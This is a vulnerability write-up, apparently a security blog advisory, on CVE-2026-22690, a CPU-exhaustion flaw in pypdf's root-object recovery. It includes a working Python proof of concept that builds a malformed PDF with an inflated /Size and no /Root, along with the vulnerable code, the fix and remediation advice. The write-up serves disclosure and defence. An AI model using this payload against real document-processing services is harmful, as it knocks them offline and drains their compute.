To understand the bug, you need to know a tiny bit about PDF structure. A PDF has a "Trailer" dictionary that tells the parser where to start. The most important key in the trailer is /Root, which points to the Document Catalog (the root of the object tree). The trailer also usually contains a /Size key, indicating the total number of objects in the file.

Here is the logic flaw in pypdf versions prior to 6.6.0: If the /Root key is missing (which makes the PDF technically invalid), the library assumes the file is just slightly corrupted. It activates a "recovery mode" to hunt for the Catalog manually.

How does it know where to look? It asks the /Size key. If the file says, "Hey, I have 100 objects," pypdf iterates through indices 0 to 100, resolving each object to see if it looks like a Catalog. The problem is that /Size is just a number in the text file. An attacker can set /Size to 2,147,483,647 (INT_MAX), remove the /Root key, and provide a file with only 1 actual object. The library will then dutifully attempt to resolve 2 billion non-existent objects, burning CPU cycles on dictionary lookups and file seeking for hours.

# Inside PdfReader.root_object root = self.trailer.get("/Root") if root is None: # Oh no, no Root! Let's find it. nb = self.trailer.get("/Size", 0) # The Loop of Doom: for i in range(nb): # This triggers parsing logic for every theoretical ID obj = self.get_object(i + 1) if isinstance(obj, DictionaryObject) and obj.get("/Type") == "/Catalog": self._validated_root = obj break

# The patched logic limit = self.root_object_recovery_limit # Default 10000 nb = self.trailer.get("/Size", 0) # Bounded range prevents infinite loop for i in range(min(nb, limit)): # ... logic ...

# malicious_gen.py exploit_pdf = ( b"%PDF-1.7\n" # Header b"1 0 obj << >> endobj\n" # Object 1 (Dummy) b"trailer << " b" /Size 2147483647 " # The Trap: 2 billion objects b">>\n" # Note: No /Root key! b"startxref\n0\n%%EOF" # End of file ) with open("dos.pdf", "wb") as f: f.write(exploit_pdf)

Product

Affected Versions

Fixed Version

pypdf

py-pdf

< 6.6.0

6.6.0

Attribute

Detail

CWE

CWE-400 (Uncontrolled Resource Consumption)

CVSS v3.1

5.3 (Medium)

Attack Vector

Network (Context-dependent)

Impact

Denial of Service (High CPU/Hang)

EPSS Score

0.00019 (Low Probability)

KEV Status

Not Listed

GHSA-4XC4-762W-M6CG

5.30.02%

pypdf CVE-2026-22690: Killing Servers with Kindness

Alon Barad

Software Engineer

Feb 22, 2026·6 min read·2 visits

PoC Available

Executive Summary (TL;DR)

pypdf tries too hard to fix broken PDFs. If a file is missing the Root object but claims to have 2 billion objects in its Size trailer, pypdf will check every single one. This loops until the CPU burns out or the universe ends.

A resource consumption vulnerability in pypdf allows attackers to trigger a Denial of Service via malformed PDF trailers. By removing the '/Root' key and inflating the '/Size' parameter, the library enters an effectively infinite loop trying to 'repair' the file, consuming 100% CPU.

Attack Flow Diagram

The Hook: When Features Become Bugs

We often praise software for being "robust" or "fault-tolerant." In the world of PDF parsing—a format that is essentially a dumpster fire of legacy specs and vendor-specific hacks—libraries have to be forgiving. If a PDF is slightly broken, users expect the library to fix it and show them the content. Enter pypdf, a pure-Python library that powers thousands of document processing pipelines.

But here is the catch: there is a fine line between being helpful and being gullible. CVE-2026-22690 is a classic example of the latter. It is not a memory corruption bug; it is a logic flaw born from kindness. When pypdf encounters a specifically malformed PDF, it doesn't throw an error. Instead, it rolls up its sleeves and attempts a "recovery" operation that an attacker can trick into taking effectively forever.

This isn't about stealing data; it's about freezing the gears of any application that processes untrusted PDFs. Think invoice parsers, resume scanners, or automated archiving bots. One 1KB file can lock up a worker thread indefinitely.

The Flaw: Trusting the /Size

The Code: The Loop of Doom

Let's look at the smoking gun in pypdf/_reader.py. This is the code that runs when strict=False (which is often the default or preferred mode for compatibility).

Vulnerable Code (< 6.6.0):

# Inside PdfReader.root_object
root = self.trailer.get("/Root")
if root is None:
    # Oh no, no Root! Let's find it.
    nb = self.trailer.get("/Size", 0)
    # The Loop of Doom:
    for i in range(nb): 
        # This triggers parsing logic for every theoretical ID
        obj = self.get_object(i + 1)
        if isinstance(obj, DictionaryObject) and obj.get("/Type") == "/Catalog":
            self._validated_root = obj
            break

See that range(nb)? That is the kill switch. The variable nb is taken directly from the attacker-controlled input. There was no cap, no timeout, and no sanity check.

The Fix (v6.6.0):

The maintainers introduced a sanity limit. Even if the file claims to have billions of objects, the recovery logic now gives up after a set number of attempts (default 10,000).

# The patched logic
limit = self.root_object_recovery_limit  # Default 10000
nb = self.trailer.get("/Size", 0)
 
# Bounded range prevents infinite loop
for i in range(min(nb, limit)):
    # ... logic ...

It is a simple fix: never trust the input to define the bounds of your loops.

The Exploit: Building the PDF Bomb

We don't need a complex fuzzer to trigger this. We can write this "exploit" by hand in a text editor. We need a valid PDF header, one dummy object so the parser doesn't crash immediately, and a malicious trailer.

Here is the recipe for disaster:

Header: %PDF-1.7
Body: A single useless object.
Trailer: Omit /Root, set /Size to max integer.

# malicious_gen.py
exploit_pdf = (
    b"%PDF-1.7\n"                 # Header
    b"1 0 obj << >> endobj\n"     # Object 1 (Dummy)
    b"trailer << "
    b"  /Size 2147483647 "        # The Trap: 2 billion objects
    b">>\n"                       # Note: No /Root key!
    b"startxref\n0\n%%EOF"        # End of file
)
 
with open("dos.pdf", "wb") as f:
    f.write(exploit_pdf)

When a vulnerable pypdf instance opens this file and tries to access reader.pages or any property requiring the root, it hits the root_object() method. It sees root is missing. It reads /Size. It starts counting. If you monitor the process, you'll see one CPU core instantly pin to 100%. In a single-threaded Python web worker, this request will never return until the web server times it out.

The Impact: Why Denial of Service Matters

Security researchers often roll their eyes at DoS bugs because they don't provide a shell. But in the context of modern cloud architecture, this is a wallet-draining vulnerability.

Imagine a SaaS platform that allows users to upload PDFs for OCR or signing. These services often use Python backends (Django/Flask/FastAPI) wrapping pypdf. If an attacker uploads 10 of these 1KB files, they can permanently lock up 10 worker processes.

If the infrastructure creates new instances to handle load (autoscaling), the attacker just triggered a financial exploit—forcing the victim to pay for compute credits to process a loop that does nothing. Because this happens in user-space Python code, it might not trigger low-level segfault protections. It just sits there, burning electricity.

The Fix: Stopping the Bleeding

The remediation is straightforward, but it requires action. The patch was released in version 6.6.0.

Primary Fix: Update your requirements file immediately.

pip install pypdf>=6.6.0

Workaround (If you can't update): If you are stuck on legacy versions, you must instantiate the PdfReader with strict mode enabled. This disables the recovery logic entirely. If a PDF is broken, it will raise an exception instead of looping forever.

# strict=True disables the "best effort" recovery
reader = PdfReader(stream, strict=True)

However, be warned: strict=True is very strict. It will reject many benign-but-slightly-malformed PDFs that users generate from cheap export tools. The only real fix is the patch.

Official Patches

pypdfPR #3594: Add recovery limit for root object search

Fix Analysis (1)

Technical Appendix

CVSS Score

5.3/ 10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

EPSS Probability

0.02%

Top 95% most exploited

Affected Systems

pypdf < 6.6.0Python applications processing untrusted PDFsDocument ingestion pipelines

Affected Versions Detail

Product	Affected Versions	Fixed Version
pypdf py-pdf	< 6.6.0	6.6.0

Attribute	Detail
CWE	CWE-400 (Uncontrolled Resource Consumption)
CVSS v3.1	5.3 (Medium)
Attack Vector	Network (Context-dependent)
Impact	Denial of Service (High CPU/Hang)
EPSS Score	0.00019 (Low Probability)
KEV Status	Not Listed

MITRE ATT&CK Mapping

T1499Endpoint Denial of Service

Impact

CWE-400

Uncontrolled Resource Consumption

The software does not properly control the allocation and maintenance of a limited resource (CPU), thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.

Known Exploits & Detection

GitHub (pypdf tests)The official repository contains a test case demonstrating the large /Size parameter triggering the limit.

Vulnerability Timeline

Fix implemented in PR #3594

2026-01-07

pypdf v6.6.0 released

2026-01-09

CVE-2026-22690 Published

2026-01-10